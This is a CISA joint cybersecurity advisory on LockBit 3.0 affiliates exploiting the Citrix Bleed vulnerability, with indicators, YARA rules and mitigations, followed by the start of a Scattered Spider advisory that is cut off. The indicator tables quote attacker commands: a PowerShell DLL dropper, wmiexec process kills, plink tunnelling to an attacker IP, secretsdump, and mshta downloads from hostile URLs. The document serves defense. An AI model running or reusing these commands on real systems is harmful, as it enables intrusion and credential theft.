Alerts

RSS Alerts from National Cyber Awareness System

November 21, 2023

#StopRansomware: LockBit 3.0 Ransomware Affiliates Exploit CVE 2023-4966 Citrix Bleed Vulnerability | CISA

SUMMARY

Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Multi-State Information Sharing & Analysis Center (MS-ISAC), and Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) are releasing this joint Cybersecurity Advisory (CSA) to disseminate IOCs, TTPs, and detection methods associated with LockBit 3.0 ransomware exploiting CVE-2023-4966, labeled Citrix Bleed, affecting Citrix NetScaler web application delivery control (ADC) and NetScaler Gateway appliances.

This CSA provides TTPs and IOCs obtained from FBI, ACSC, and voluntarily shared by Boeing. Boeing observed LockBit 3.0 affiliates exploiting CVE-2023-4966, to obtain initial access to Boeing Distribution Inc., its parts and distribution business that maintains a separate environment. Other trusted third parties have observed similar activity impacting their organization.

Historically, LockBit 3.0 affiliates have conducted attacks against organizations of varying sizes across multiple critical infrastructure sectors, including education, energy, financial services, food and agriculture, government and emergency services, healthcare, manufacturing, and transportation. Observed TTPs for LockBit ransomware attacks can vary significantly in observed TTPs.

Citrix Bleed, known to be leveraged by LockBit 3.0 affiliates, allows threat actors to bypass password requirements and multifactor authentication (MFA), leading to successful session hijacking of legitimate user sessions on Citrix NetScaler web application delivery control (ADC) and Gateway appliances. Through the takeover of legitimate user sessions, malicious actors acquire elevated permissions to harvest credentials, move laterally, and access data and resources.

CISA and the authoring organizations strongly encourage network administrators to apply the mitigations found in this CSA, which include isolating NetScaler ADC and Gateway appliances and applying necessary software updates through the Citrix Knowledge Center.

The authoring organizations encourage network defenders to hunt for malicious activity on their networks using the detection methods and IOCs within this CSA. If a potential compromise is detected, organizations should apply the incident response recommendations. If no compromise is detected, organizations should immediately apply patches made publicly available.

For the associated Malware Analysis Report (MAR), see: MAR-10478915-1.v1 Citrix Bleed

Download the PDF version of this report:

For a downloadable copy of IOCs, see:

AA23-325A STIX XML (XML, 29.22 KB )
AA23-325A STIX JSON (JSON, 23.00 KB )

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

CVE-2023-4966

CVE-2023-4966 is a software vulnerability found in Citrix NetScaler ADC and NetScaler Gateway appliances with exploitation activity identified as early as August 2023. This vulnerability provides threat actors, including LockBit 3.0 ransomware affiliates, the capability to bypass MFA [T1556.006] and hijack legitimate user sessions [T1563].

After acquiring access to valid cookies, LockBit 3.0 affiliates establish an authenticated session within the NetScaler appliance without a username, password, or access to MFA tokens [T1539]. Affiliates acquire this by sending an HTTP GET request with a crafted HTTP Host header, leading to a vulnerable appliance returning system memory information [T1082]. The information obtained through this exploit contains a valid NetScaler AAA session cookie.

Citrix publicly disclosed CVE-2023-4966 on Oct. 10, 2023, within their Citrix Security Bulletin, which issued guidance, and detailed the affected products, IOCs, and recommendations. Based on widely available public exploits and evidence of active exploitation, CISA added this vulnerability to the Known Exploited Vulnerabilities (KEVs) Catalog. This critical vulnerability exploit impacts the following software versions [1]:

  • NetScaler ADC and NetScaler Gateway 14.1 before 14.1-8.50
  • NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.15
  • NetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.19
  • NetScaler ADC and NetScaler Gateway version 12.1 (EOL)
  • NetScaler ADC 13.1FIPS before 13.1-37.163
  • NetScaler ADC 12.1-FIPS before 12.1-55.300
  • NetScaler ADC 12.1-NDcPP before 12.1-55.300

Due to the ease of exploitation, CISA and the authoring organizations expect to see widespread exploitation of the Citrix vulnerability in unpatched software services throughout both private and public networks.

Threat Actor Activity

Malware identified in this campaign is generated beginning with the execution of a PowerShell script (123.ps1) which concatenates two base64 strings together, converts them to bytes, and writes them to the designated file path.

$y = "TVqQAAMA..."
$x = "RyEHABFQ..."
$filePath = "C:UsersPublicadobelib.dll"
$fileBytes = [System.Convert]::FromBase64String($y + $x)
[System.IO.File]::WriteAllBytes($filePath, $fileBytes)

The resulting file (adobelib.dll) is then executed by the PowerShell script using rundll32.

rundll32 C:UsersPublicadobelib.dll,main

The Dynamic Link Library (DLL) will not execute correctly without the 104 hex character key. Following execution, the DLL attempts to send a POST request to https://adobe-us-updatefiles[.]digital/index.php which resolves to IP addresses 172.67.129[.]176 and 104.21.1[.]180 as of November 16, 2023. Although adobelib.dll and the adobe-us-updatefiles[.]digital have the appearance of legitimacy, the file and domain have no association with legitimate Adobe software and no identified interaction with the software.

Other observed activities include the use of a variety of TTPs commonly associated with ransomware activity. For example, LockBit 3.0 affiliates have been observed using AnyDesk and Splashtop remote management and monitoring (RMM), Batch and PowerShell scripts, the execution of HTA files using the Windows native utility mshta.exe and other common software tools typically associated with ransomware incidents.

INDICATORS OF COMPROMISE (IOCS)

See Table 1–Table 5 for IOCs related to Lockbit 3.0 affiliate exploitation of CVE-2023-4966.

[Fidelity] Legend:
  • High = Indicator is unique or highly indicates LockBit in an environment.
  • Medium = Indicator was used by LockBit but is used outside of LockBit activity, albeit rarely.
  • Low = Indicates tools that are commonly used but were used by LockBit.

Low confidence indicators may not be related to ransomware.

Table 1: LockBit 3.0 Affiliate Citrix Bleed Campaign

Indicator

Type

Fidelity

Description

192.229.221[.]95

IP

Low

Mag.dll calls out to this IP address. Ties back to dns0.org. Should run this DLL in a sandbox, when possible, to confirm C2. IP is shared hosting.

123.ps1

PowerShell script

High

Creates and executes payload via script.

193.201.9[.]224

IP

High

FTP to Russian geolocated IP from compromised system.

62.233.50[.]25

IP

High

Russian geolocated IP from compromised system.

Hxxp://62.233.50[.]25/en-us/docs.html

Hxxp://62.233.50[.]25/en-us/test.html

51.91.79[.].17

IP

Med

Temp.sh IP.

Teamviewer

Tool (Remote Admin)

Low

 

70.37.82[.]20

IP

Low

IP was seen from a known compromised account reaching out to an Altera IP address. LockBit is known to leverage Altera, a remote admin tool, such as Anydesk, team viewer, etc.

185.17.40[.]178

IP

Low

Teamviewer C2, ties back to a polish service provider, Artnet Sp. Zo.o. Polish IP address.

Table 2: LockBit 3.0 Affiliate Citrix Bleed Campaign

Indicator

Type

Fidelity

Description

185.229.191.41

Anydesk Usage

High

Anydesk C2.

81.19.135[.]219

IP

High

Russian geolocated IP hxxp://81.19.135[.]219/F8PtZ87fE8dJWqe.hta

Hxxp://81.19.135[.]219:443/q0X5wzEh6P7.hta

45.129.137[.]233

IP

Medium

Callouts from known compromised device beginning during the compromised window.

185.229.191[.]41

Anydesk Usage

High

Anydesk C2.

Plink.exe

Command interpreter

High

Plink (PuTTY Link) is a command-line connection tool, similar to UNIX SSH. It is mostly used for automated operations, such as making CVS access a repository on a remote server. Plink can be used to automate SSH actions and for remote SSH tunneling on Windows.

AnyDeskMSI.exe

Remote admin tool

High

We do see that AnyDeskMSI.exe was installed as a service with “auto start” abilities for persistence. Config file from the image could be leveraged to find the ID and Connection IP, but we do not have that currently.

SRUtility.exe

Splashtop utility

 

9b6b722ba4a691a2fe21747cd5b8a2d18811a173413d4934949047e04e40b30a

Netscan exe

Network scanning software

High

498ba0afa5d3b390f852af66bd6e763945bf9b6bff2087015ed8612a18372155

Table 3: LockBit 3.0 Affiliate Citrix Bleed Campaign

Indicator

Type

Fidelity

Description

Scheduled task:

MEGAMEGAcmd

Persistence

 

High

 

Scheduled task:

UpdateAdobeTask

Persistence

High

 

Mag.dll

Persistence

High

Identified as running within UpdateAdobeTask cc21c77e1ee7e916c9c48194fad083b2d4b2023df703e544ffb2d6a0bfc90a63.

123.ps1

Script

High

Creates rundll32 C:UsersPublicadobelib.dll,main ed5d694d561c97b4d70efe934936286fe562addf7d6836f795b336d9791a5c44.

Adobelib.dll

Persistence

Low

C2 from adobelib.dll.

Adobe-us-updatefiles[.]digital

Tool Download

High

Used to download obfuscated toolsets.

172.67.129[.]176

Tool Download

High

IP of adobe-us-updatefiles[.]digital.

104.21.1[.]180

Tool Download

High

Adobe-us-updatefiles[.]digital.

cmd.exe /q /c cd 1> \127.0.0.1admin$__1698617793[.]44 2>&1

Command

High

wmiexec.exe usage

cmd.exe /q /c cd 1> \127.0.0.1admin$__1698617793[.]44 2>&1

Command

High

wmiexec.exe usage

cmd.exe /q /c query user 1> \127.0.0.1admin$__1698617793[.]44 2>&1

Command

High

wmiexec.exe usage

cmd.exe /q /c taskkill /f /im sqlwriter.exe /im winmysqladmin.exe /im w3sqlmgr.exe /im sqlwb.exe /im sqltob.exe /im sqlservr.exe /im sqlserver.exe /im sqlscan.exe /im sqlbrowser.exe /im sqlrep.exe /im sqlmangr.exe /im sqlexp3.exe /im sqlexp2.exe /im sqlex

Command

High

wmiexec.exe usage

cmd.exe /q /c cd 1> \127.0.0.1admin$__1698618133[.]54 2>&1

Command

High

wmiexec.exe usage

The authoring organizations recommended monitoring/reviewing traffic to the 81.19.135[.]* class C network and review for MSHTA being called with HTTP arguments [2].

Table 4: LockBit 3.0 Affiliate Citrix Bleed Campaign

Indicator

Type

Fidelity

Description

Notes

81.19.135[.]219

IP

High

Russian geolocated IP used by user to request mshta with http arguments to download random named HTA file named q0X5wzzEh6P7.hta

 

81.19.135[.]220

IP

High

Russian geolocated IP, seen outbound in logs

IP registered to a South African Company

81.19.135[.]226

IP

High

Russian geolocated IP, seen outbound in logs

IP registered to a South African Company

Table 5: Citrix Bleed Indicators of Compromise (IOCs)

Type

Indicator

Description

Filename

c:usersdownloadsprocess hacker 2peview.exe

Process hacker

Filename

c:usersmusicprocess hacker 2processhacker.exe

Process hacker

Filename

psexesvc.exe

Psexec service excutable

Filename

c:perflogsprocesshacker.exe

Process hacker

Filename

c:windowstempscreenconnect23.8.5.8707filesprocesshacker.exe

Process hacker transferred via screenconnect

Filename

c:perflogslsass.dmp

Lsass dump

Filename

c:usersdownloadsmimikatz.exe

Mimikatz

Filename

c:usersdesktopproc64proc.exe

Procdump

Filename

c:usersdocumentsveeam-get-creds.ps1

Decrypt veeam creds

Filename

secretsdump.py

Impacket installed on azure vm

Cmdline

secretsdump.py /@ -outputfile 1

Impacket installed on azure vm

Filename

ad.ps1

Adrecon found in powershell transcripts

Filename

c:perflogs64-bitnetscan.exe

Softperfect netscan

Filename

tniwinagent.exe

Total network inventory agent

Filename

psexec.exe

Psexec used to deploy screenconnect

Filename

7z.exe

Used to compress files

Tool

Action1

RMM

Tool

Atera

RMM

tool

anydesk

rmm

tool

fixme it

rmm

tool

screenconnect

rmm

tool

splashtop

rmm

tool

zoho assist

rmm

ipv4

101.97.36[.]61

zoho assist

ipv4

168.100.9[.]137

ssh portforwarding infra

ipv4

185.20.209[.]127

zoho assist

ipv4

185.230.212[.]83

zoho assist

ipv4

206.188.197[.]22

powershell reverse shell seen in powershell logging

ipv4

54.84.248[.]205

fixme ip

Ipv4

141.98.9[.]137

Remote IP for CitrixBleed

domain

assist.zoho.eu

zoho assist

filename

c:perflogs1.exe

connectwise renamed

filename

c:perflogsrun.exe

screenconnect pushed by psexec

filename

c:perflogs64-bitm.exe

connectwise renamed

filename

c:perflogs64-bitm0.exe

connectwise renamed

filename

c:perflogsza_access_my_department.exe

zoho remote assist

filename

c:usersmusicza_access_my_department.exe

zoho remote assist

filename

c:windowsservicehost.exe

plink renamed

filename

c:windowssysconf.bat

runs servicehost.exe (plink) command

filename

c:windowstempscreenconnect23.8.5.8707filesazure.msi

zoho remote assist used to transfer data via screenconnect

cmdline

echo enter | c:windowsservicehost.exe -ssh -r 8085:127.0.0.1:8085 @168.100.9[.]137 -pw

plink port forwarding

domain

eu1-dms.zoho[.]eu

zoho assist

domain

fixme[.]it

fixme it

domain

unattended.techinline[.]net

fixme it

MITRE ATT&CK TACTICS AND TECHNIQUES

See Table 6 and Table 7 for all referenced threat actor tactics and techniques in this advisory.

Table 6: ATT&CK Techniques for Enterprise: Discovery

Technique Title

ID

Use

System Information Discovery

T1082

Threat actors will attempt to obtain information about the operating system and hardware, including versions, and patches.

Table 7: ATT&CK Techniques for Enterprise: Credential Access

Technique Title

ID

Use

Modify Authentication Process: Multifactor Authentication

T1556.006

Threat actors leverage vulnerabilities found within CVE- to compromise, modify, and/or bypass multifactor authentication to hijack user sessions, harvest credentials, and move laterally, which enables persistent access.

Steal Web Session Cookie

T1539

Threat actors with access to valid cookies can establish an authenticated session within the NetScaler appliance without a username, password, or access to multifactor authentication (MFA) tokens.

DETECTION METHODS

Hunting Guidance

Network defenders should prioritize observing users in session when hunting for network anomalies. This will aid the hunt for suspicious activity such as installing tools on the system (e.g., putty, rClone ), new account creation, log item failure, or running commands such as hostname, quser, whoami, net, and taskkill. Rotating credentials for identities provisioned for accessing resources via a vulnerable NetScaler ADC or Gateway appliance can also aid in detection.

For IP addresses:

  • Identify if NetScaler logs the change in IP.
  • Identify if users are logging in from geolocations uncommon for your organization’s user base.
  • If logging VPN authentication, identify if users are associated with two or more public IP addresses while in a different subnet or geographically dispersed.

Note: MFA to NetScaler will not operate as intended due to the attacker bypassing authentication by providing a token/session for an already authenticated user.

The following procedures can help identify potential exploitation of CVE-2023-4966 and LockBit 3.0 activity:

  • Search for filenames that contain tf0gYx2YI for identifying LockBit encrypted files.
  • LockBit 3.0 actors were seen using the C:Temp directory for loading and the execution of files.
  • Investigate requests to the HTTP/S endpoint from WAF.
  • Hunt for suspicious login patterns from NetScaler logs
  • Hunt for suspicious virtual desktop agent Windows Registry keys
  • Analyze memory core dump files.

Below, are CISA developed YARA rules and an open-source rule that may be used to detect malicious activity in the Citrix NetScaler ADC and Gateway software environment. For more information on detecting suspicious activity within NetScaler logs or additional resources, visit CISA’s Malware Analysis Report (MAR) MAR-10478915-1.v1 Citrix Bleed or the resource section of this CSA [3]:

YARA Rules

CISA received four files for analysis that show files being used to save registry hives, dump the Local Security Authority Subsystem Service (LSASS) process memory to disk, and attempt to establish sessions via Windows Remote Management (WinRM). The files include:

  • Windows Batch file (.bat)
  • Windows Executable (.exe)
  • Windows Dynamic Link Library (.dll)
  • Python Script (.py)
rule CISA_10478915_01 : trojan installs_other_components
{
meta:
author = "CISA Code & Media Analysis"
incident = "10478915"
date = "2023-11-06"
last_modified = "20231108_1500"
actor = "n/a"
family = "n/a"
capabilities = "installs-other-components"
malware_Type = "trojan"
tool_type = "information-gathering"
description = "Detects trojan .bat samples"
sha256 = "98e79f95cf8de8ace88bf223421db5dce303b112152d66ffdf27ebdfcdf967e9"
strings:
$s1 = { 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 61 73 6b 73 5c 7a 2e 74 78 74 }
$s2 = { 72 65 67 20 73 61 76 65 20 68 6b 6c 6d 5c 73 79 73 74 65 6d 20 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 61 73 6b 73
5c 65 6d }
$s3 = { 6d 61 6b 65 63 61 62 20 63 3a 5c 75 73 65 72 73 5c 70 75 62 6c 69 63 5c 61 2e 70 6e 67 20 63 3a 5c 77 69 6e 64
6f 77 73 5c 74 61 73 6b 73 5c 61 2e 63 61 62 }
condition:
all of them
}

This file is a Windows batch file called a.bat that is used to execute the file called a.exe with the file called a.dll as an argument. The output is printed to a file named 'z.txt' located in the path C:WindowsTasks. Next, a.bat pings the loop back internet protocol (IP) address 127.0.0[.]1 three times.

The next command it runs is reg save to save the HKLMSYSTEM registry hive into the C:Windowstasksem directory. Again, a.bat pings the loop back address 127.0.0[.]1 one time before executing another reg save command and saves the HKLMSAM registry hive into the C:WindowsTaskam directory. Next, a.bat runs three makecab commands to create three cabinet (.cab) files from the previously mentioned saved registry hives and one file named C:UsersPublica.png. The names of the .cab files are as follows:

  • c:windowstasksem.cab
  • c:windowstasksam.cab
  • c:windowstasksa.cab

rule CISA_10478915_02 : trojan installs_other_components
{
meta:
author = "CISA Code & Media Analysis"
incident = "10478915"
date = "2023-11-06"
last_modified = "20231108_1500"
actor = "n/a"
family = "n/a"
capabilities = "installs-other-components"
malware_type = "trojan"
tool_type = "unknown"
description = "Detects trojan PE32 samples"
sha256 = "e557e1440e394537cca71ed3d61372106c3c70eb6ef9f07521768f23a0974068"
strings:
$s1 = { 57 72 69 74 65 46 69 6c 65 }
$s2 = { 41 70 70 50 6f 6c 69 63 79 47 65 74 50 72 6f 63 65 73 73 54 65 72 6d 69 6e 61 74 69 6f 6e 4d 65 74 68 6f 64 }
$s3 = { 6f 70 65 72 61 74 6f 72 20 63 6f 5f 61 77 61 69 74 }
$s4 = { 43 6f 6d 70 6c 65 74 65 20 4f 62 6a 65 63 74 20 4c 6f 63 61 74 6f 72 }
$s5 = { 64 65 6c 65 74 65 5b 5d }
$s6 = { 4e 41 4e 28 49 4e 44 29 }
condition:
uint16(0) == 0x5a4d and pe.imphash() == "6e8ca501c45a9b85fff2378cffaa24b2" and pe.size_of_code == 84480 and all of
them
}

This file is a 64-bit Windows command-line executable called a.exe that is executed by a.bat. This file issues the remote procedure call (RPC) ncalrpc:[lsasspirpc] to the RPC end point to provide a file path to the LSASS on the infected machine. Once the file path is returned, the malware loads the accompanying DLL file called a.dll into the running LSASS process. If the DLL is correctly loaded, then the malware outputs the message "[*]success" in the console.

rule CISA_10478915_03 : trojan steals_authentication_credentials credential_exploitation
{
meta:
author = "CISA Code & Media Analysis"
incident = "10478915"
date = "2023-11-06"
last_modified = "20231108_1500"
actor = "n/a"
family = "n/a"
capabilities = "steals-authentication-credentials"
malware_type = "trojan"
tool_type = "credential-exploitation"
description = "Detects trojan DLL samples"
sha256 = "17a27b1759f10d1f6f1f51a11c0efea550e2075c2c394259af4d3f855bbcc994"
strings:
$s1 = { 64 65 6c 65 74 65 }
$s2 = { 3c 2f 74 72 75 73 74 49 6e 66 6f 3e }
$s3 = { 42 61 73 65 20 43 6c 61 73 73 20 44 65 73 63 72 69 70 74 6f 72 20 61 74 20 28 }
$s4 = { 49 6e 69 74 69 61 6c 69 7a 65 43 72 69 74 69 63 61 6c 53 65 63 74 69 6f 6e 45 78 }
$s5 = { 46 69 6e 64 46 69 72 73 74 46 69 6c 65 45 78 57 }
$s6 = { 47 65 74 54 69 63 6b 43 6f 75 6e 74 }
condition:
uint16(0) == 0x5a4d and pe.subsystem == pe.SUBSYSTEM_WINDOWS_CUI and pe.size_of_code == 56832 and all of
them
}

This file is a 64-bit Windows DLL called a.dll that is executed by a.bat as a parameter for the file a.exe. The file a.exe loads this file into the running LSASS process on the infected machine. The file a.dll calls the Windows API CreateFileW to create a file called a.png in the path C:UsersPublic.

Next, a.dll loads DbgCore.dll then utilizes MiniDumpWriteDump function to dump LSASS process memory to disk. If successful, the dumped process memory is written to a.png. Once this is complete, the file a.bat specifies that the file a.png is used to create the cabinet file called a.cab in the path C:WindowsTasks.

rule CISA_10478915_04 : backdoor communicates_with_c2 remote_access
{
meta:
author = "CISA Code & Media Analysis"
incident = "10478915"
date = "2023-11-06"
last_modified = "20231108_1500"
actor = "n/a"
family = "n/a"
capabilities = "communicates-with-c2"
malware_type = "backdoor"
tool_type = "remote-access"
description = "Detects trojan python samples"
sha256 = "906602ea3c887af67bcb4531bbbb459d7c24a2efcb866bcb1e3b028a51f12ae6"
strings:
$s1 = { 70 6f 72 74 20 3d 20 34 34 33 20 69 66 20 22 68 74 74 70 73 22 }
$s2 = { 6b 77 61 72 67 73 2e 67 65 74 28 22 68 61 73 68 70 61 73 73 77 64 22 29 3a }
$s3 = { 77 69 6e 72 6d 2e 53 65 73 73 69 6f 6e 20 62 61 73 69 63 20 65 72 72 6f 72 }
$s4 = { 57 69 6e 64 77 6f 73 63 6d 64 2e 72 75 6e 5f 63 6d 64 28 73 74 72 28 63 6d 64 29 29 }
condition:
all of them
}

This file is a Python script called a.py that attempts to leverage WinRM to establish a session. The script attempts to authenticate to the remote machine using NT LAN Manager (NTLM) if the keyword "hashpasswd" is present. If the keyword "hashpasswd" is not present, then the script attempts to authenticate using basic authentication. Once a WinRM session is established with the remote machine, the script has the ability to execute command line arguments on the remote machine. If there is no command specified, then a default command of “whoami” is run.

Open Source YARA Rule

Import "pe" 
rule M_Hunting_Backdoor_FREEFIRE 
{
meta: author = "Mandiant" 
description = "This is a hunting rule to detect FREEFIRE samples using OP code sequences in getLastRecord method"
 md5 = "eb842a9509dece779d138d2e6b0f6949" 
malware_family = "FREEFIRE" 
strings: $s1 = { 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 74 ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 74 ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? ?? 

condition: 
uint16(0) == 0x5A4D 
and filesize >= 5KB 
and pe.imports("mscoree.dll") 
and all of them }

INCIDENT RESPONSE

Organizations are encouraged to assess Citrix software and your systems for evidence of compromise, and to hunt for malicious activity (see Additional Resources section).If compromise is suspected or detected, organizations should assume that threat actors hold full administrative access and can perform all tasks associated with the web management software as well as installing malicious code.

If a potential compromise is detected, organizations should:

  1. Quarantine or take offline potentially affected hosts.
  2. Reimage compromised hosts.
  3. Create new account credentials.
  4. Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections.
    • Note: Removing malicious administrator accounts may not fully mitigate risk considering threat actors may have established additional persistence mechanisms.
  5. Report the compromise to FBI Internet Crime Complaint Center (IC3) at IC3.gov, local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center ([email protected] or 888-282-0870). State, local, tribal, or territorial government (SLTT) entities can also report to MS-ISAC ([email protected] or 866-787-4722). If outside of the US, please contact your national cyber center.

MITIGATIONS

These mitigations apply to all critical infrastructure organizations and network defenders using Citrix NetScaler ADC and Gateway software. CISA and authoring organizations recommend that software manufacturers incorporate secure-by-design and -default principles and tactics into their software development practices to limit the impact of exploitation such as threat actors leveraging unpatched vulnerabilities within Citrix NetScaler appliances, which strengthens the security posture of their customers.

For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide.

The authoring organizations of this CSA recommend organizations implement the mitigations below to improve your cybersecurity posture on the basis of the threat actor activity and to reduce the risk of compromise associated with Citrix CVE 2023-4966 and LockBit 3.0 ransomware & ransomware affiliates. These mitigations align with the Cross-Sector Cybersecurity performance goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

  • Isolate NetScaler ADC and Gateway appliances for testing until patching is ready and deployable.
  • Secure remote access tools by:
    • Implement application controls to manage and control the execution of software, including allowlisting remote access programs. Application controls should prevent the installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.
  • Strictly limit the use of RDP and other remote desktop services. If RDP is necessary, rigorously apply best practices, for example [CPG 2.W]:
  • Restrict the use of PowerShell, using Group Policy, and only grant access to specific users on a case-by-case basis. Typically, only those users or administrators who manage the network or Windows operating systems (OSs) should be permitted to use PowerShell [CPG 2.E].
  • Update Windows PowerShell or PowerShell Core to the latest version and uninstall all earlier PowerShell versions. Logs from Windows PowerShell prior to version 5.0 are either non-existent or do not record enough detail to aid in enterprise monitoring and incident response activities [CPG 1.E, 2.S, 2.T].
  • Enable enhanced PowerShell logging [CPG 2.T, 2.U].
    • PowerShell logs contain valuable data, including historical OS and registry interaction and possible TTPs of a threat actor’s PowerShell use.
    • Ensure PowerShell instances, using the latest version, have module, script block, and transcription logging enabled (enhanced logging).
    • The two logs that record PowerShell activity are the PowerShell Windows Event Log and the PowerShell Operational Log. FBI and CISA recommend turning on these two Windows Event Logs with a retention period of at least 180 days. These logs should be checked on a regular basis to confirm whether the log data has been deleted or logging has been turned off. Set the storage size permitted for both logs to as large as possible.
  • Configure the Windows Registry to require User Account Control (UAC) approval for any PsExec operations requiring administrator privileges to reduce the risk of lateral movement by PsExec.
  • Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, or the cloud).
  • Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with NIST's standards for developing and managing password policies.
    • Use longer passwords consisting of at least 15 characters [CPG 2.B].
    • Store passwords in hashed format using industry-recognized password managers.
    • Add password user “salts” to shared login credentials.
    • Avoid reusing passwords [CPG 2.C].
    • Implement multiple failed login attempt account lockouts [CPG 2.G].
    • Disable password “hints."
    • Require administrator credentials to install software.
  • Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Organizations should patch vulnerable software and hardware systems within 24 to 48 hours of vulnerability disclosure. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E].
    • Upgrade vulnerable NetScaler ADC and Gateway appliances to the latest version available to lower the risk of compromise.

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Table 1).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA and the authoring organizations recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

RESOURCES

REPORTING

The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with LockBit 3.0 affiliates, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. The FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI Internet Crime Complaint Center (IC3) at ic3.gov, local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center at [email protected] or (888) 282-0870.

Australian organizations that have been impacted or require assistance in regard to a ransomware incident can contact ASD’s ACSC via 1300 CYBER1 (1300 292 371), or by submitting a report to cyber.gov.au.

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. CISA and authoring organizations do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and the authoring organizations.

ACKNOWLEDGEMENTS

Boeing contributed to this CSA.

REFERENCES

[1] NetScaler ADC and NetScaler Gateway Security Bulletin for CVE-2023-4966
[2] What is Mshta, How Can it Be Used and How to Protect Against it (McAfee)
[3] Investigation of Session Hijacking via Citrix NetScaler ADC and Gateway Vulnerability (CVE-2023-4966)

 

VERSION HISTORY

November 21, 2023: Initial version.

 

 

November 15, 2023

Scattered Spider | CISA

SUMMARY

The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) in response to recent activity by Scattered Spider threat actors against the commercial facilities sectors and subsectors. This advisory provides tactics, techniques, and procedures (TTPs) obtained through FBI investigations as recently as November 2023.

Scattered Spider is a cybercriminal group that targets large companies and their contracted information technology (IT) help desks. Scattered Spider threat actors, per trusted third parties, have typically engaged in data theft for extortion and have also been known to utilize BlackCat/ALPHV ransomware alongside their usual TTPs.

The FBI and CISA encourage critical infrastructure organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of a cyberattack by Scattered Spider actors.

Download the PDF version of this report:

A23-320A Scattered Spider (PDF, 517.03 KB )

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 14. See the MITRE ATT&CK® Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Overview

Scattered Spider (also known as Starfraud, UNC3944, Scatter Swine, and Muddled Libra) engages in data extortion and several other criminal activities.[1] Scattered Spider threat actors are considered experts in social engineering and use multiple social engineering techniques, especially phishing, push bombing, and subscriber identity module (SIM) swap attacks, to obtain credentials, install remote access tools, and/or bypass multi-factor authentication (MFA). According to public reporting, Scattered Spider threat actors have [2],[3],[4]:

